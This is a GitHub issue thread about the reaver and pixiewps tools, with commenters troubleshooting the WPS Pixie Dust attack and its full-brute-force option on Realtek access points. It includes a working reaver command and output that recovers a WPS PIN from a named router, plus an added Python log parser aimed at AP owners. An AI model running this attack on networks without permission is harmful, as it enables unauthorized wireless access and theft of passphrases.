
Comments (4)

soxrok2212 commented on August 16, 2024

Regarding both problems: does the same thing happen for ALL access points? Different models? Etc?

There is no such thing as -K 4; the option that came up was probably -f. -f is a pixiewps command used against Realtek-based APs when the nonce is not generated within the same second as E-S1 and E-S2. I'm actually not sure if you can use -f in Reaver or if you have to manually use -f in pixiewps; I've always had success without the full brute force.

from reaver-wps-fork-t6x.

kcdtv commented on August 16, 2024

My Realtek access point requires the -f option.
I'll be home in a couple of days and will be able to tell you if the option can be run straightforwardly in reaver or if you have to do it with pixiewps.

Then, remember that rt3070 devices work very badly with reaver, since the first version.
Try with bully; it works fine with rt3070 and the mod is very easy to do to get the element for pixiedust.

from reaver-wps-fork-t6x.

kcdtv commented on August 16, 2024

Sorry for the delay...
I tried at home with reaver + pixiewps 1.2 against a supported Realtek that requires the full brute force option.
I launched reaver with argument -k 1

sudo reaver -i wlan0mon -b B8:55:10:02:F0:A1 -vv -K 1

I got to the M3 message and pixiedust is automatically launched.
It doesn't find the PIN at first:

[+] Waiting for beacon from B8:55:10:02:F0:A1
[+] Switching wlan0mon to channel 11
[+] Associated with B8:55:10:02:F0:A1 (ESSID: TOTOLINK N301RT)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 690 ms
[Pixie-Dust]  

But it is launched automatically a second time with the -f option:

[Pixie-Dust]   [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]  
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [*] PRNG Seed:  1344583431 (Fri Aug 10 07:23:51 2012 UTC)
[Pixie-Dust]   [*] Mode:       3 (RTL819x)
[Pixie-Dust]   [*] PSK1:       13:a8:23:9f:87:2e:f0:8b:35:52:98:dd:7e:00:fc:33
[Pixie-Dust]   [*] PSK2:       bd:38:5e:36:73:1b:c8:47:34:eb:3a:00:b2:e8:eb:60
[Pixie-Dust]   [*] E-S1:       2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust]   [*] E-S2:       2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust]   [+] WPS pin:    03004203
[Pixie-Dust]

You see that E-S1 = E-S2 and pixiewps sees it too; that's why it knows that the device can be brute forced with the --force option

and then I can recover the WPA passphrase with the PIN - automatically

So there is no doubt about it:
If you use -K 1 in your reaver line you will automatically execute pixiewps a second time with the "--force" option if the device is vulnerable and requires it.
Because that's what pixiewps does.

from reaver-wps-fork-t6x.
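
Added example, not part of the thread and not code from reaver or pixiewps: a small Python parser for a `reaver -K 1` log like the one quoted above, written for the owner of the access point who wants to record whether the forced second pass was needed, whether E-S1 and E-S2 were identical, and whether the PIN was recovered. The function names and the remediation wording are assumptions; the sample lines are copied from the output in the comment above.

```python
import re

# Log excerpt copied from the reaver/pixiewps output quoted in the comment above.
SAMPLE_LOG = """\
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]   [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]   [*] PRNG Seed:  1344583431 (Fri Aug 10 07:23:51 2012 UTC)
[Pixie-Dust]   [*] Mode:       3 (RTL819x)
[Pixie-Dust]   [*] E-S1:       2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust]   [*] E-S2:       2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust]   [+] WPS pin:    03004203
"""

# "[Pixie-Dust]   [*] Key:   value" result lines; [-] and [!] status lines do not match.
FIELD = re.compile(r"^\[Pixie-Dust\]\s+\[[*+]\]\s+([\w -]+?):\s+(.+?)\s*$")

def parse_pixie_log(text):
    """Return the findings an AP auditor needs from a reaver -K 1 log (hypothetical helper)."""
    fields, first_pass_failed, forced = {}, False, False
    for line in text.splitlines():
        if "WPS pin not found" in line:
            first_pass_failed = True      # first pixiewps pass gave up
        elif "trying -f" in line:
            forced = True                 # reaver re-ran pixiewps with -f
        m = FIELD.match(line)
        if m:
            fields[m.group(1).strip().lower()] = m.group(2)
    es1, es2 = fields.get("e-s1"), fields.get("e-s2")
    return {
        "mode": fields.get("mode"),
        "needed_full_bruteforce": first_pass_failed and forced,
        "secret_nonces_identical": es1 is not None and es1 == es2,
        "pin_recovered": "wps pin" in fields,
    }

def remediation(findings):
    """Map findings to an action for the AP owner (wording is an assumption of this example)."""
    if findings["pin_recovered"]:
        return "disable WPS PIN on this AP and rotate the WPA passphrase"
    if findings["secret_nonces_identical"]:
        return "disable WPS PIN on this AP"
    return "no PIN recovered in this run"

if __name__ == "__main__":
    report = parse_pixie_log(SAMPLE_LOG)
    print(report, "->", remediation(report))
```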

kcdtv commented on August 16, 2024

About your second issue:

Also I have noticed that often when using the -N -K 1 option I can successfully get the pin but it never gives me the psk..

That's maybe why the option -N is not enabled by default... 😉 You should try with a basic syntax first (adding -n is a good trick, in lower case, not upper case)

from reaver-wps-fork-t6x.
